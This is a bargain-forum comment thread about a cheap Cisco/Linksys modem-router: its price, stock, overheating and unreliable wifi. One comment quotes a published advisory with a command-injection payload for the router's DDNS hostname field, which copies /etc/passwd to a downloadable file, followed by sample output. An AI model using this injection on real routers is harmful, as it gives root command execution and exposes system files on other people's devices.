  • Been this price for a while now, somebody posted this a few weeks ago. Not much stock around though, you got lucky.

Receipt says they are $9.99 each, not $9.95

  • Ah, noticed a $20 post a month back. Looking at it yes some places had it for 10

  • Just a basic search shows:
    http://seclists.org/fulldisclosure/2012/Nov/158

1º Authenticate and browse to /setup.cgi?next_file=Setup_DDNS.htm
2º All the fields you see are vulnerables to command execution as root, so
    inject "qwe.com;cat /etc/passwd> /www/Routercfg.cfg;" into the Hostname
    field
3º Everything is done, just download the file /Routercfg.cfg (Authenticated
    is requiered)

    root::0:0:root:/:/bin/sh
    nobody::99:99:Nobody:/:/sbin/sh

…but you still need to have authenticated with the router first…

That's like saying this door had 100 locks on it, but it's easily exploitable if it's open.

  • Is this N150?

  • Sydney?Kogarah?Hurstville,Rockdale?Anyone got 1?

  • What? The receipt says "19.98", not "9.95".

      Oh, I missed the "x2"

  • Created an account to warn you the Cisco WAG120 & WAG160 are rubbish modems. You could cook an egg on it after a few hours of powering on. Good price but look for something else…

  • I paid $50 for one of these last year and have hardly used it.

    • +5

Ill give you $9.95 for it?

  • So how many were actually in stock?
Or is this a case of no real availability?

  • Theres a review sitting up the top right of this deal stating this is a rubbish modem that runs hot.
WiFi- it just doesn't work and when it plays up it locks the whole unit. Setting it on G band only makes it better but it still needs resetting every 48 hours. Its a known issue on all the forums
Runs hot, crashes frequently - N band WiFi does not work

Think I'll spend my $9.95 elsewhere.

I'm still amazed that we don't have gigabit ports on everything now. Its a lot like have VGA and USB 1.1 still.

(Yes I need a gigabit switch but too cheap to buy one)

    • +1

No you don't. What is a home user going to need gigabit ethernet for?

    • +2

What's the point? The general consumer (who these entry-level devices are aimed at) just use them for internet access over wifi. ADSL is way slower than 100Mbps now.

The entry-level market don't have multiple computers connected via Ethernet to do file sharing. They likely won't even know what samba is, much less run a NAS. More tech-savvy consumers will know to spend more on a gigabit router.

      It's a bit like saying why aren't all wireless routers 802.11ac now? 802.11n is so 2009. :)

      • Sounds like a back-handed slap directed at jso for being too cheap to be a real tech-savvy consumer :)

        • ahah nah, I just don't think people should be expecting enthusiast-level features in entry-level equipment. :)

Maybe it runs hot because from it's looks people mistakenly think it's an ashtray ;-)

    • Wow, tough crowd (or Linksys router designers) ;-)
